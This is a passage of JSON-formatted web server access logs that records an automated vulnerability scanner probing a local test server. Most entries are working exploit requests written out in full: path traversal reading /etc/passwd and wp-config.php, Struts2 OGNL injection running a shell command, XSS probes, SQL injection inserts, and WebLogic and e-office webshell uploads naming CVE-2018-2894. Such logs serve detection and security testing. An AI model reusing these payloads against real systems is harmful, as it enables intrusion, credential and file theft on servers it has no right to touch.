HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ampps/index.php?act=login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/spec/swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wiki HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hp/device/DeviceInformation/View HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_noticeboard&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /names.nsf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /main.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"setting_id=general&BasicConfigOptions.workDir=%2Fu01%2Foracle%2Fuser_projects%2Fdomains%2Fbase_domain%2Fservers%2FAdminServer%2Ftmp%2F_WL_internal%2Fcom.oracle.webservices.wls.ws-testclient-app-wls%2F4mcj4y%2Fwar%2Fcss&BasicConfigOptions.proxyHost=&BasicConfigOptions.proxyPort=80","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ws_utc/resources/setting/options HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /script/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/complexassetmaker&cs_imagedir=qqq\x22> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /content/..;/crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/V1/store/storeViews HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets/img/favicon-32x32.png HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/spec/swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openapi.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/elfinder/elfinder-cke.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /examples/jsp/snp/snoop.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"--e64bdf16c554bbc109cecef6451c26a4\x0D\x0AContent-Disposition: form-data; name=\x22Filedata\x22; filename=\x22297MFkt0rmdtYQp6RlDZYMMtUp1.php\x22\x0D\x0AContent-Type: image/jpeg\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A--e64bdf16c554bbc109cecef6451c26a4--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/common/login/webLogin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"------WebKitFormBoundaryuim0dyiDSPBPu31g\x0D\x0AContent-Disposition: form-data; name=\x22ks_name\x22\x0D\x0A\x0D\x0A297MFgbhPWw4mXb2wBa73di5x2B\x0D\x0A------WebKitFormBoundaryuim0dyiDSPBPu31g\x0D\x0AContent-Disposition: form-data; name=\x22ks_edit_mode\x22\x0D\x0A\x0D\x0Afalse\x0D\x0A------WebKitFormBoundaryuim0dyiDSPBPu31g\x0D\x0AContent-Disposition: form-data; name=\x22ks_password_front\x22\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundaryuim0dyiDSPBPu31g\x0D\x0AContent-Disposition: form-data; name=\x22ks_password\x22\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundaryuim0dyiDSPBPu31g\x0D\x0AContent-Disposition: form-data; name=\x22ks_password_changed\x22\x0D\x0A\x0D\x0Afalse\x0D\x0A------WebKitFormBoundaryuim0dyiDSPBPu31g\x0D\x0AContent-Disposition: form-data; name=\x22ks_filename\x22; filename=\x22297MFgbhPWw4mXb2wBa73di5x2B.jsp\x22\x0D\x0AContent-Type: application/octet-stream\x0D\x0A\x0D\x0A<%@ page import=\x22java.util.*,java.io.*\x22%>\x0D\x0A<%@ page import=\x22java.security.MessageDigest\x22%>\x0D\x0A\x0D\x0A<%\x0D\x0AString cve = \x22CVE-2018-2894\x22;\x0D\x0AMessageDigest alg = MessageDigest.getInstance(\x22MD5\x22);\x0D\x0Aalg.reset();\x0D\x0Aalg.update(cve.getBytes());\x0D\x0Abyte[] digest = alg.digest();\x0D\x0AStringBuffer hashedpasswd = new StringBuffer();\x0D\x0AString hx;\x0D\x0Afor (int i=0;i\x0D\x0A------WebKitFormBoundaryuim0dyiDSPBPu31g--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ws_utc/resources/setting/keystore HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /package.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FNoXceleditor&WemUI=qqq%27;}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login/sls/auth HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/install.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /opensis/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger/ui/index HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/canal/config/1/1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets/backend/elfinder/elfinder-cke.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /images/logo/logo-eoffice.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /settings.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=elex-product-feed-manage&search=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"type=image&field_id=image&tag=image&from=image&search=image&options=[\x22test'); INSERT INTO extra_field_rel_tag(field_id, tag_id, item_id) VALUES (16, 16, 16); INSERT INTO extra_field_values(field_id, item_id,value) VALUES (16, 16,'297MFkkNrETBRPXEZbHbKmfCxDR'); INSERT INTO extra_field_options(option_value) VALUES ('297MFkkNrETBRPXEZbHbKmfCxDR'); INSERT INTO tag (id, tag, field_id,count) VALUES(16, '297MFkkNrETBRPXEZbHbKmfCxDR', 16,0) ON DUPLICATE KEY UPDATE tag='297MFkkNrETBRPXEZbHbKmfCxDR', field_id=16, count=0; -- \x22]","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /main/inc/ajax/extra_field.ajax.php?a=search_options_from_tags HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /package-lock.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v1/submissions HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FProcessLoginRequest&WemUI=qqq%27;}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jmx-console/ 